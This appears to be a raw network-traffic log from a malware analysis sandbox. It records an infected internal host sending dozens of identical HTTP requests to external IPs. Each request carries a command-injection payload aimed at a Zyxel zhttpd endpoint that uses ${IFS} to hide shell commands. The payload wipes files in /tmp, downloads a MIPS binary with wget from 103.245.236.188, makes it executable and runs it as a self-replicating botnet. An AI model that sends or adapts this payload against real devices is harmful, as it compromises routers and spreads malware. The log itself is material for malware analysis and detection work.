                                                Jan 12, 2024 18:16:37.790216923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8090192.168.2.234634879.190.150.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790246964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8091192.168.2.2333874162.157.187.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790302992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8092192.168.2.2335966154.211.17.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790328026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8093192.168.2.233748057.34.120.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790385962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8094192.168.2.2356468168.235.76.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790427923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8095192.168.2.235013445.170.87.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790487051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8096192.168.2.2334106176.167.0.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790496111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8097192.168.2.2337006149.214.73.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790529966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8098192.168.2.234110682.0.139.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790564060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8099192.168.2.234695437.125.62.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790623903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8100192.168.2.234866471.141.198.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790669918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8101192.168.2.2333836202.241.229.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790704966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8102192.168.2.2338398112.3.215.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790760994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8103192.168.2.233864643.65.213.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790777922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8104192.168.2.2343834213.111.105.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790803909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8105192.168.2.2350938145.46.82.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790863991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8106192.168.2.2336670164.35.241.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790904045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8107192.168.2.2360088213.192.206.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790946960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8108192.168.2.234858645.89.152.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791003942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8109192.168.2.2341180151.147.246.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791049004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8110192.168.2.233884271.196.102.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791096926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8111192.168.2.234137468.53.38.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791137934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8112192.168.2.2358854195.60.38.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791171074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8113192.168.2.234495476.180.14.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791198969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8114192.168.2.234692434.160.203.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791256905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8115192.168.2.2343484115.118.151.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791281939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8116192.168.2.2344630217.54.125.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791315079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8117192.168.2.2335696166.22.169.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791376114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8118192.168.2.2345658133.82.149.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791393995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8119192.168.2.235953653.148.245.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791448116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8120192.168.2.235978627.101.150.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791469097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8121192.168.2.2333282160.212.65.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791513920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8122192.168.2.2333146164.56.233.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791554928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8123192.168.2.2347300163.109.183.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791621923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8124192.168.2.2353486140.206.70.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791651011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8125192.168.2.235790844.235.35.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791709900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8126192.168.2.2346858192.169.56.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791749001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8127192.168.2.2354526117.12.108.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791793108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8128192.168.2.234931813.240.64.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791840076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8129192.168.2.2344218138.221.104.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791868925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8130192.168.2.234278827.76.235.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791912079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8131192.168.2.2358256142.31.98.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.791989088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8132192.168.2.2336418223.197.60.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792009115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8133192.168.2.235043440.91.66.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792028904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8134192.168.2.2359778118.184.81.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792062044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8135192.168.2.2339264122.166.98.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792104006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8136192.168.2.2344338175.191.122.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792160988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8137192.168.2.2360580104.33.143.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792207003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8138192.168.2.2351286149.19.208.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792223930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8139192.168.2.2334912115.180.29.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792292118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8140192.168.2.233500676.218.84.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792346001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8141192.168.2.234325863.116.100.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792395115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8142192.168.2.2338858213.111.92.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792431116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8143192.168.2.234775063.121.50.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792470932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8144192.168.2.2337062206.35.70.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792529106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8145192.168.2.2357828130.224.89.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792573929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8146192.168.2.2349266113.144.14.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792614937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8147192.168.2.234221482.104.232.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792646885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8148192.168.2.2349996148.174.238.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792701960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8149192.168.2.23582524.111.216.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792743921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8150192.168.2.2333946211.145.29.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792768955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8151192.168.2.2345234117.251.211.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792805910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8152192.168.2.234339467.49.104.203443
                                                TimestampBytes transferredDirectionData
